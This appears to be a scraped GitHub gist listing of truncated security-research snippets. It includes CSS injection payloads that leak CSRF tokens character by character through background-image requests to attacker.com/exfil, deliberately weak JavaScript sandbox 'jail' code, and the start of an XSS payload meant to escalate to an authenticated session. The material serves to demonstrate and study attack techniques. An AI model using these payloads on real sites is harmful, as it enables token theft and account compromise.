This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #![feature(await_macro, async_await, futures_api)] | |
| extern crate futures; | |
| #[macro_use] | |
| extern crate tokio; | |
| extern crate tokio_async_await; | |
| use tokio::prelude::*; | |
| use tokio::runtime::Runtime; | |
| use tokio_async_await::compat::backward; |
d0nutptr
/ has_selector_query.css
Created
July 25, 2018 07:45
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| form:has(input[name=csrf][value^=token]) { | |
| background-image: url(https://attacker.com/exfil/token); | |
| } |
d0nutptr
/ example_css_injection_3.css
Created
July 25, 2018 07:24
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| input[name=csrf][value^=csrF] ~ * { | |
| background-image: url(https://attacker.com/exfil/csrF); | |
| } |
d0nutptr
/ example_html_sibling_selectors.html`
Created
July 25, 2018 07:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <div> | |
| <p color=red>Hello there!</p> | |
| <p>This is also red!</p> | |
| <p>Me too!</p> | |
| </div> | |
| <div> | |
| <p>This is not red :o </p> | |
| </div> |
d0nutptr
/ example_css_sibling_selector.css
Created
July 25, 2018 07:17
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| p[color=red] ~ p { | |
| color: red; | |
| } |
d0nutptr
/ example_css_injection_2.css
Last active
July 25, 2018 07:12
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| input[name=csrf][value^=ca]{ | |
| background-image: url(https://attacker.com/exfil/ca); | |
| } | |
| input[name=csrf][value^=cb]{ | |
| background-image: url(https://attacker.com/exfil/cb); | |
| } | |
| /* ... */ | |
| input[name=csrf][value^=c9]{ | |
| background-image: url(https://attacker.com/exfil/c9); | |
| } |
d0nutptr
/ example_css_injection_1.css
Created
July 25, 2018 07:04
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| input[name=csrf][value^=a]{ | |
| background-image: url(https://attacker.com/exfil/a); | |
| } | |
| input[name=csrf][value^=b]{ | |
| background-image: url(https://attacker.com/exfil/b); | |
| } | |
| /* ... */ | |
| input[name=csrf][value^=9]{ | |
| background-image: url(https://attacker.com/exfil/9); | |
| } |
d0nutptr
/ slightly_better_jail_but_still_shitty.js
Created
May 31, 2018 15:21
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function jail(code) { | |
| // quick string escape for inner strings | |
| code = code.replace(/["'`\\]/g, function(v){ return `\\${v}`}); | |
| var jail_script = "new Function("; | |
| // Blacklist all global scope values | |
| for(prop in window) { | |
| jail_script += `"${prop}", `; | |
| } |
d0nutptr
/ intentionally_shitty_jail.js
Created
May 31, 2018 15:20
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function jail(code) { | |
| // quick string escape for inner strings | |
| code = code.replace(/["'`\\]/g, function(v){ return `\\${v}`}); | |
| var jail_script = "new Function("; | |
| // Blacklist all global scope values | |
| for(prop in window) { | |
| jail_script += `"${prop}", `; |
d0nutptr
/ payload.js
Created
May 21, 2018 08:33
Simple trick to go from unauthenticated XSS to authenticated if user logs in on another tab/browser with the same cookie jar.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| frame = document.createElement("iframe"); | |
| function test_auth() { | |
| console.log("Checking auth state..."); | |
| title = frame.contentDocument.getElementsByTagName("h1")[0].children[0].innerText; | |
| var is_auth = title != "Login"; | |
| if(is_auth) { | |
| name = title.split(" ")[2]; | |
| clearInterval(auth_checker); |
NewerOlder